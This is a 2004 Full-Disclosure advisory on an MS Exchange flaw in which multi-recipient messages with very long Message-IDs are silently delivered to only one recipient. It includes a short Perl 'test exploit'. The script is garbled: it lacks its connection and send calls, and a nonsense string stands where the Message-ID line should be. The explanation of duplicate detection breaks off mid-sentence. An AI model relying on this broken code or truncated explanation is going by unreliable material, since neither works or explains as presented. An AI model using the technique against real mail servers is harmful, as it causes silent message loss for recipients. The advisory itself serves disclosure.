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[Full-Disclosure] MS Exchange message lost

* MS Exchange duplicate message fault (message lost)
* MS Exchange (all versions affected) duplicate message fault 
* I discovered this bug independently on 10, 2003 
* public post 05, 2004
* Helmut Schmitz < i.d.s@xxxxxx >
* (c) 2003/2004 Copyright by Helmut Schmitz - HackForce.NET -  */

MS Exchange Server (tested on 5.5 and 2003) has a bug ... If you send
Messages with long message ids (>189 bytes?)to more than one recipient (cc),
the message will not delivered correctly ... there is no correct logging !!,
the messages will be delivered to only one Recipient ... the message to the
other will be lost !!

I have send this issue to Microsoft (10.2003) ... some months later
(05.2004) I got the fix, but not public ... store.exe (6.5.6980.81) with
some reg settings fixes (workaround ;-) the problem.

Perl Example (test exploit) ...

#!/usr/bin/perl -w
use Net::SMTP;
$from = 'sender@xxxxxxxxxxxxx';
$to = 'user1@xxxxxxxxxxxxx';
$cc = 'user2@xxxxxxxxxxxxx';
$subject = 'Test Email';
$smtp = Net::SMTP->new('yourmailserver');
$smtp->datasend("To: <$to>\n");
$smtp->datasend("Cc: <$cc>\n");
$smtp->datasend("From:  <$from>\n");
$smtp->datasend("Subject: $subject\n");
feejktmhedgedherngrondljzhng> \n");

Duplicate detection is decided by three factors.  These are MessageID,
RootFID (the root folder ID of the mailbox) and the SubmitTime into the
store.  These are used to build a unique key when the message is submitted.
If all the factors are the same value, then we recognize the message as


I think some people know how to use this "FEATURE" ...  I hope this post
will speed up the fix release!

Helmut Schmitz

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